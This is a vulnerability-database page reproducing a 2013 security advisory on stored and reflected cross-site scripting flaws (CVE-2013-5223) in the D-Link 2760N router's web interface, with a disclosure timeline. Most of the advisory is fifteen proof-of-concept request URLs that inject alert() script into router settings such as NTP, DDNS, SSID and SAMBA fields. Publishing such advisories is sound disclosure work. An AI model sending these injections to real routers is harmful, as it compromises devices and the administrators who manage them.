Vulners
Lucene search
D-Link Router 2760N Cross Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | D-Link Router 2760N Cross Site Scripting Vulnerability | 12 Nov 201300:00 | – | zdt |
 | CVE-2013-5223 | 19 Nov 201300:00 | – | attackerkb |
 | CVE-2013-5223 | 14 Jun 202321:10 | – | circl |
 | D-Link DSL-2760U Gateway Cross-Site Scripting Vulnerability | 25 Mar 202200:00 | – | cisa_kev |
 | D-Link DSL-2760U Gateway Cross Site Scripting (CVE-2013-5223) | 5 Apr 202200:00 | – | checkpoint_advisories |
 | CVE-2013-5223 | 15 Nov 201320:00 | – | cve |
 | CVE-2013-5223 | 15 Nov 201320:00 | – | cvelist |
 | CVE-2013-5223 | 19 Nov 201304:50 | – | nvd |
 | Cross site scripting | 19 Nov 201304:50 | – | prion |
 | VulnCheck KEV: CVE-2013-5223 | 11 Nov 202100:00 | – | vulncheck_kev |
10
`Advisory: D-Link Router 2760N (DSL-2760U-BN) Multiple XSS
Author: Liad Mizrachi
Vendor URL: http://www.dlink.com
Status: Fixed
CVE-ID: CVE-2013-5223
==========================
Vulnerability Description
==========================
Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link Router 2760N, both stored and reflected in various sections of the router Web-UI.
==========================
PoC
==========================
1) NTS Settings
http://<D_LINK_HOST>/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=0
2) Dynamic DNS (Reflected/Stored)
http://<D_LINK_HOST>/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0
3)Parental Control
http://<D_LINK_HOST>/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732
4) URL Filtering
http://<D_LINK_HOST>/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80
5) NAT - Port Triggering
http://<D_LINK_HOST>/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,
6) IP Filtering:
http://<D_LINK_HOST>/scoutflt.cmd?action=add&fltName=<script>alert('XSS')</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080
7) IP Filtering - Removal Error:
http://<D_LINK_HOST>/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"):
http://<D_LINK_HOST>/portmapcfg.cmd?action=add&groupName=<Script>alert('XSS')</script>&choiceBox=|usb0|wl0|&wanIfName=atm1
9) SNMP
http://<D_LINK_HOST>/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.0
10) Incoming IP Filter:
http://<D_LINK_HOST>/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert('XSS&protocol=2&srcAddr=SS')</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080
11) Policy Routing Add:
http://<D_LINK_HOST>/prmngr.cmd?action=add&PolicyName=<script>alert('X&SourceIp=SS');</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111
12)Policy Routing -Removal Error:
http://<D_LINK_HOST>/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
13) Printer Server
http://<D_LINK_HOST>/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('XSS-Printer-Sever');//
14) SAMBA Configuration
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';var x="XSS";//&smbDirName=b';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
15) WiFi SSID
Step 1 (Create XSS as Wireless SSID):
http://<D_LINK_HOST>/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16
Step 2:
Goto the Wireless -> Security [http://<D_LINK_HOST>/wlsecurity.html]
OR
Goto the Wireless -> MAC Filter [http://<D_LINK_HOST>/wlmacflt.cmd?action=view]
==========================
Disclosure Timeline
==========================
17-Aug-2013 - Vendor Informed - No response.
23-Aug-2013 - Vendor Re-Informed - No response.
01-Sep-2013 - Vendor Re-Informed - No response.
10-Sep-2013 - Vendor Re-Informed - No response.
10-Oct-2013 - Vendor Re-Informed - No response.
==========================
References
==========================
http://www.dlink.com
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Nov 2013 00:00Current
5.5Medium risk
Vulners AI Score5.5
EPSS0.30076